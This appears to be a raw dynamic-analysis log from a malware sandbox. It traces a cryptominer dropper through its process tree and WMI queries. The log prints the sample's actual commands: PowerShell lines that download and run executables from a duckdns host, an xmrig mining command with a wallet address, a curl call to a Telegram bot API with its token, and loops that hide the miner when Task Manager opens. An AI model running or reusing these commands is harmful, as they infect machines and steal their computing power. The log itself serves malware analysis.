Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
